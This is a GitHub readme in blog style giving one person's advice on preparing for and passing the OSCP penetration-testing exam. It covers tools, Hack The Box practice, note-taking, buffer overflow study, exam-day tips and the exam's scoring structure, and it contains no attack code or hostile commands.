rahmiy / codebear_unkoalified_oscp_guide Goto Github PK

The Unkoalified OSCP Guide

updated 2nd December 2019

UPDATE: I have since learned you have to do some lab time before attempting an exam. Get the shortest amount and do what's suggested here.

Offensive Security says "Try Harder!" I say "Try Google!".

Up front I don't think you need to pay for any more than the minimum lab time to pass the exam.

I'm going to recommend you pay for a few things but they will be cheaper that paying for even the shortest lab time. As a disclaimer I receive no payment from any of the recommendations it's just what I personnally use.

Hopefully you'll find this blog post short and helpful so let's get into it.

My Background

When I first started I had no background in pentesting. What I had done was maybe three of the easy hack the box machines.

Tools you'll need

Something to run your virtual machine. I use VMWare Workstation Pro, I paid for this license because I use it for work as well. If you're going to keep doing stuff like this then I think it's a good investment if you just want to try it OSCP out then use VMWare Player which will do the same thing but it's free.

The latest stable Kali Linux 64-Bit. If you did purchase the PWK course it will recommend to use theirs but it is riddled with problems and you only need it for one course exercise.

At this point I can't even remember how I started learning about VMWare but I'm sure you can Try Google!

Once it's installed there are a few key tools in Kali that I used all the time:

• Cherry Tree - This should be installed by default and I will show you how I took notes later.
• tmux - An easy to use terminal, sudo apt-get install tmux. Ham Vocke has a good blog here.
• xclip - Allows the user to cat a file and pipe it to xclip -sel c which puts the contents onto your clipboard. Install with sudo apt-get install xclip.
• nmapautomator - The enumeration tool I use for HTB and all of the exam machines. The user 21y4d created the tool to use during their OSCP exam, check it out here.

What to study

These suggestions are somewhat in order.

I had no idea what to do in Linux and the tricks in the command line. Over The Wire's Bandit is awesome and it's free!

Hack The Box... goes without saying. Buy a VIP subscription! This will allow you to do the retired boxes. Then do the following:

1. Complete the boxes compiled by tjnull which can be found here. If you want to read the blog post look here.
2. Try the boxes in order (kind of a difficulty rating) when you get stuck watch how IPPSEC does it and then continue on by yourself.
3. On each machine take notes in Cherry Tree. I used a template like the image below and then stored extra information about the machine like nmap scans or ssh keys in sub nodes. This was a suggestion from my friend Apr4h, make sure to check out their work.

The buffer overflow box is just a skill you learn. justinsteven wrote a great tutorial called dostackbufferoverflowgood. Make sure you do them and don't just read the PDF. You'll need a Windows VM networked in VMWare to exploit some of the examples.

What to read

Google "how to pass OSCP" and read as many blogs as you can, they will all give you references. Save references as bookmarks if you find them useful.

Save the exploits you use in HTB and document how you used them so you can replicate it during the exam if you need to.

Your own documentation will be invaluable.

Exam

Tips:

• Eat good food.
• Take breaks.
• Have a good nights sleep.
• Have a doggo keep you company.

I had two attempts:

1. I spent way too long on the buffer overflow machine but in the end I think the binary on the test machine was different from the victim machine.
2. I pretty much followed the advice I'm giving here and got the buffer overflow in under 2 hours. Then I got both 20pt machines, and the 10pt machine. All of these I got root on in less then 12 hours and then had a good sleep and spent the rest of the time trying to get the 25pt machine.

Get your exam ticket and book a good time for you. I started around 7am both times so I was fresh from a good nights sleep.

There are 5 exam machines:

1. 25pts = buffer overflow (follow the process, pretty easy)
2. 25pts = hard machine (multiple vulnerbilities strung together)
3. 20pts = med machine (pretty easily found open source)
4. 20pts = med machine (pretty easily found open source)
5. 10pts = easy machine (should be obvious single step)

Report

whoisflynn passed their exam with an updated template. I found it easy to use, check it out on whoisflynn's github page

Conclusion

So what's the final cost?

• HTB VIP membership
• Minimum OSCP lab time + exam ticket
• Time.

I achieved my goal of completing what I've just listed above before doing my exam and I passed (the second time).

Don't be afriad of failing the first time either. You'll gain valuable experience and figure out your weaknesses. Plus it's much cheaper than purchasing the labs.